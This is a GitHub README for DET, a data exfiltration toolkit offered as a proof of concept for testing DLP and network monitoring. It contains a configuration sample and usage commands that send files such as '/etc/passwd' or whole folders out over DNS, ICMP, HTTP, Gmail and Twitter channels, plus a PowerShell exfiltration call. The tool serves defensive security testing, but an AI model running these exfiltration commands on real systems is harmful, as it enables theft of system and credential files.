Skip to content
(extensible) Data Exfiltration Toolkit (DET)
Branch: master
Clone or download

Latest commit

singe Broken link in previous commit
Brackets, how do they work? Doh.
Latest commit 417cbce Nov 3, 2017


Type Name Latest commit message Commit time
Failed to load latest commit information.
.gitignore Initial commit Mar 8, 2016
LICENSE Broken link in previous commit Nov 3, 2017
config-sample.json Fix dns.ps1 Jul 29, 2016 Added compression via zlib. Can be turned on in the config file. Jun 4, 2016
requirements.txt added Slack integration (sends data to a specific channel) Jul 7, 2016

DET (extensible) Data Exfiltration Toolkit

DET (is provided AS IS), is a proof of concept to perform Data Exfiltration using either single or multiple channel(s) at the same time.

This is a Proof of Concept aimed at identifying possible DLP failures. This should never be used to exfiltrate sensitive/live data (say on an assessment)

The idea was to create a generic toolkit to plug any kind of protocol/service to test implmented Network Monitoring and Data Leakage Prevention (DLP) solutions configuration, against different data exfiltration techniques.

The primary repository has now moved to here.


DET has been presented at BSides Ljubljana on the 9th of March 2016 and the slides will be available here. Slides are available here.

Example usage (ICMP plugin)





Usage while combining two channels (Gmail/Twitter)






Clone the repo:

git clone


pip install -r requirements.txt --user


In order to use DET, you will need to configure it and add your proper settings (eg. SMTP/IMAP, AES256 encryption passphrase and so on). A configuration example file has been provided and is called: config-sample.json

    "plugins": {
        "http": {
            "target": "",
            "port": 8080
        "google_docs": {
            "target": "",
            "port": 8080,
        "dns": {
            "key": "",
            "target": "",
            "port": 53
        "gmail": {
            "username": "",
            "password": "ReallyStrongPassword",
            "server": "",
            "port": 587
        "tcp": {
            "target": "",
            "port": 6969
        "udp": {
            "target": "",
            "port": 6969
        "twitter": {
            "username": "PaulWebSec",
            "ACCESS_TOKEN": "XXXXXXXXX",
        "icmp": {
            "target": ""
    "sleep_time": 10


Help usage

python -h
usage: [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]

Data Exfiltration Toolkit (SensePost)

optional arguments:
  -h, --help  show this help message and exit
  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')
  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')
  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')
  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')
  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')
  -L          Server mode


To load every plugin:

python -L -c ./config.json

To load only twitter and gmail modules:

python -L -c ./config.json -p twitter,gmail

To load every plugin and exclude DNS:

python -L -c ./config.json -e dns


To load every plugin:

python -c ./config.json -f /etc/passwd

To load only twitter and gmail modules:

python -c ./config.json -p twitter,gmail -f /etc/passwd

To load every plugin and exclude DNS:

python -c ./config.json -e dns -f /etc/passwd

And in PowerShell (HTTP module):

PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'


So far, DET supports multiple protocols, listed here:

  • HTTP(S)
  • ICMP
  • DNS
  • SMTP/IMAP (eg. Gmail)
  • Raw TCP
  • PowerShell implementation (HTTP, DNS, ICMP, SMTP (used with Gmail))

And other "services":

  • Google Docs (Unauthenticated)
  • Twitter (Direct Messages)

Experimental modules

So far, I am busy implementing new modules which are almost ready to ship, including:

  • Skype (95% done)
  • Tor (80% done)
  • Github (30/40% done)



Some pretty cool references/credits to people I got inspired by with their project:


You can reach me on Twitter @PaulWebSec. Feel free if you want to contribute, clone, fork, submit your PR and so on.


DET is licensed under a MIT License. Permissions beyond the scope of this license may be available at

You can’t perform that action at this time.